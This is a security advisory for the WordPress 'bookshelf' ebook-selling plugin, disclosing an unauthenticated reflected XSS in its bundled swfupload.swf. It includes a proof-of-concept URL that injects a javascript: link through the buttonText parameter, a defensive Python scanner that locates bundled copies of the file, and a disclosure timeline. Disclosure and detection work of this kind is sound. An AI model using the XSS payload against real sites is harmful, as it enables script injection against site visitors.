wp-plugin : bookshelf

Plugin Details
Plugin Name: wp-plugin : bookshelf
Affected Version : 2 (and most probably lower versions, if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/plugins/bookshelf/includes/js/jquery-asyncUpload-0.1/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E
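As an added, defender-side example (not part of the original advisory): a small Python scan that walks a wp-content/plugins tree and reports every bundled copy of swfupload.swf, the component whose known XSS this advisory reuses, together with its SHA-256 so copies can be compared against a known-bad hash list. The sample tree it builds is constructed here to mirror the PoC path; the plugin names and file contents in it are placeholders.

```python
import hashlib
import os
import tempfile

# Filename of the vulnerable bundled component named in this advisory.
VULNERABLE_BASENAME = "swfupload.swf"


def find_bundled_swfupload(plugins_dir):
    """Walk a wp-content/plugins tree and return every swfupload.swf copy
    found, as dicts with the owning plugin, relative path and SHA-256."""
    hits = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if name.lower() != VULNERABLE_BASENAME:
                continue
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(path, plugins_dir)
            hits.append({"plugin": rel.split(os.sep)[0], "path": rel, "sha256": digest})
    return hits


def build_sample_plugins_dir():
    """Construct a throwaway plugins tree mirroring the path in the PoC.
    Contents are placeholders, not real plugin files."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    vuln = os.path.join(base, "bookshelf", "includes", "js", "jquery-asyncUpload-0.1")
    os.makedirs(vuln)
    with open(os.path.join(vuln, "swfupload.swf"), "wb") as fh:
        fh.write(b"FWS placeholder, not a real SWF")  # constructed stand-in
    clean = os.path.join(base, "some-clean-plugin")
    os.makedirs(clean)
    with open(os.path.join(clean, "plugin.php"), "w") as fh:
        fh.write("<?php // constructed placeholder\n")
    return base


if __name__ == "__main__":
    # Point this at a real wp-content/plugins directory to audit an install.
    for hit in find_bundled_swfupload(build_sample_plugins_dir()):
        print(f"{hit['plugin']}: {hit['path']} sha256={hit['sha256']}")
```

Any hit is a bundled Flash uploader that should be removed or blocked at the web server rather than left reachable, since the XSS lives in the SWF itself and not in the plugin's PHP.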
Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
This plugin allows you to sell ebooks. It works with PayPal and has a multiple-currency option. This plugin adds a buy now button at the end of the book description. Book descriptions can be written on posts. Simply add **"price"** to the custom value (without quotes) of the post. The price value should be without a currency symbol. You can choose the currency option from the plugin settings page. For instructions visit http://www.revood.com/blog/using-bookshelf-2-0/ For suggestions and feedback visit http://www.revood.com/blog/bookshelf-2-0/